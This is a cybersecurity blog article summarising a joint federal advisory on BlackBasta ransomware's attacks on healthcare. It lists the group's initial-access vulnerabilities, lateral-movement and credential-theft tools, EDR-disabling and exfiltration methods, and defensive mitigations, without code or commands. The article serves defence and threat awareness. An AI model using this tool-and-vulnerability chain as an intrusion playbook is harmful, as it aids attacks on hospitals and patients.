Exclusive Insights: Joint Advisory Sheds Light on BlackBasta Ransomware's Healthcare Attacks

Aug 12, 2024 |

Ransomware attacks have become a critical threat to the healthcare industry, impacting patients' care and data security and disrupting operational continuity. The recent attack on UnitedHealth's Change Healthcare subsidiary in February 2024 brought to light how attractive the healthcare industry and data are to hackers and how devastating consequences they can cause for patients and doctors. The ALPHV/BlackCat group was behind this attack and received a Bitcoin payment worth $22m to restore data.

Another notable ransomware group targeting the healthcare sector is the BlackBasta ransomware. According to the researchers at Kaspersky, this ransomware variant was the 12th most active ransomware family in 2023. BlackBasta ransomware gang continues to rule the cyber landscape as it has targeted over 500 organizations in the past two years, and healthcare industries are no exception. This shocking revelation was made in an advisory issued by Federal agencies, healthcare associations, and security researchers.

Insight from the Joint Cybersecurity Advisory

To combat the escalating threats posed by ransomware, the Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), Department of Health and Human Services (HHS), and Multi-State Information Sharing and Analysis Center (MS-ISAC) on May 10th released a joint CSA that provides detailed information about the BlackBasta ransomware. This collective initiative showed the outstanding commitment of these organizations to fortify safety measures against cyber adversaries.

The alert was issued after a ransomware attack hit a major healthcare provider, Ascension, which affected critical services and systems of 140 hospitals in 19 states. BlackBasta is regarded as a ransomware-as-a-service (RaaS) operator and has impacted more than 500 organizations and critical infrastructure in North America, Europe, and Australia between April 2022 and May 2024, the advisory reported. This group has encrypted and stolen data from almost 12 of 16 critical infrastructure sectors, including the Healthcare and Public Health (HPH) sector.

Healthcare organizations are the most lucrative targets for cybercriminals due to their size, easy access to vast amounts of personal health information, and technological dependence. Like many other members of the ransomware family, BlackBasta exploits known vulnerabilities or uses phishing method to gain initial access. Some researchers have claimed that affiliates have also used Qakbot infection for initial access.

Moreover, the advisory revealed that since February 2024, this group has been exploiting critical vulnerabilities in ConnectWise. Similarly, researchers from Trend Micro have linked Black Basta in exploiting CVE-2024-1709, a critical vulnerability within a CVSS score of 10.

After getting initial access, the ransomware affiliates use a wide range of tools such as SoftPerfect network scanner for network scanning and BITSAdmin, Remote Desktop Protocol (RDP), and PsExec for lateral movement. Cybersecurity researchers have also observed that some affiliates have relied on tools like Cobalt Strike, Screen Connect, and Splashtop for lateral movement.

Later, the malware leverages the double extortion method for encrypting and exfiltrating data. The ransomware has used tools like Mimikatz for privilege escalation and RClone for data exfiltration. Additionally, some other techniques that BlackBasta ransomware uses to get privilege escalation include exploiting various security flaws like NoPac (CVE-2021-42278 and CVE-2021-42287), PrintNightmare (CVE 2021-34527), and ZeroLogon (CVE-2020-1472).

Prior to exfiltration, cybersecurity researchers found that the ransomware variant uses PowerShell to disable antivirus software, increasing their chances of success. Also, it deploys a tool known as Backstab that turns off endpoint detection and response (EDR). Once these programs are disabled, a ChaCha20 algorithm with an RA-4096 public key encrypts the files and leaves a ransom note on the compromised systems.

Recommendations for HealthCare Organizations

The authoring organizations have recommended that all organizations and cybersecurity professionals implement effective measures that align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and NIST. Following these best practices helps organizations improve their overall security posture and minimize the potential of ransomware attacks. The mitigation tips include the following:

  • Update firmware, software, and operating systems to the latest versions as soon as they are released.

  • Install modern anti-malware software and update signatures where needed.

  • Implement phishing-resistant multi-factor authentication (MFA) across a wide range of services.

  • Always validate the URL of the link by hovering the cursor over the link and check if it matches the link's text.

  • Healthcare organizations should ensure that electronic public healthcare information (ePHI) is secured and compliant with HIPAA.

  • Organizations must identify their critical business assets by using active scans, passive processes, or a combination of both.

  • Identify, evaluate, and prioritize vulnerabilities across the environment so they can be dealt with appropriately within time. For prioritizing vulnerabilities, use the Common Vulnerability Scoring System (CVSS), which helps decide which vulnerabilities to prioritize.

Besides following these measures, the authoring organizations in the advisory advised testing and validating the organizations' security program to know how they perform against the MITRE ATT&CK techniques. They recommend continuous testing of the security program to ensure its optimal performance against the MITRE ATT&CK techniques.

To get started with testing, follow the steps below:

  1. Choose an ATT&CK technique as described in the advisory.

  2. Align your security technologies against the chosen technique.

  3. Test your technologies.

  4. Analyze your detection and prevention technologies' performance.

  5. Repeat the process for all security technologies to have a set of comprehensive performance data.

  6. Tune your security program based on the data generated by this process.

Black Basta Ransomware- An Overview

BlackBasta is a notorious ransomware variant and Ransomware-as-a-Service (RaaS) operator that first appeared in early 2022. Though it is still relatively new on the cybercrime scene, it has established itself as one of the most active RaaS threat actors and gained popularity globally for its sophisticated tactics and success rate.

According to Malwarebytes, the group was linked with 28 of the 373 confirmed ransomware attacks in April 2024.

BlackBasta is believed to have a close affiliation with the Conti group because of the similarities in their approach to create malware, leak sites, and communicate for payment negotiation and data recovery. The ransomware group has targeted organizations, including financial services, healthcare, government, education, and media across the globe. In a recent attack, the Toronto Public Library fell victim to the BlackBasta ransomware gang. The attack on Canada's largest public library system disrupted library services, including access to digital resources, patron information, and other essential functions. Similarly, the same group targeted the UK outsourcing giant and public service specialist, Capita in March 2023. The attack resulted in exceptional costs in the region of £15m to £20m while the clients could not receive vital public services for days.

The group leverages a double extortion tactic, encrypts the victims' data, and threatens them to publish it online if their demands aren't met. However, in early campaigns, BlackBasta used email or spear phishing methods to get initial access and to deploy ransomware on the target's device. Besides this, the gang has also used other techniques to deploy ransomware, like disabling the compromised system DNS to complicate the recovery process and deploying ransomware that targets Linux-based VMware ESXi Virtual Machines (VMs). They even have a public leak website where they publish data about their victims and samples of stolen data to create pressure to pay ransom. Victims who do not agree to their demands risk their sensitive information being exposed on these platforms.

Explore more topics on OT Cyber Security here.

Categories: : OT Security

© 2024 Xploit Cybersecurity Academy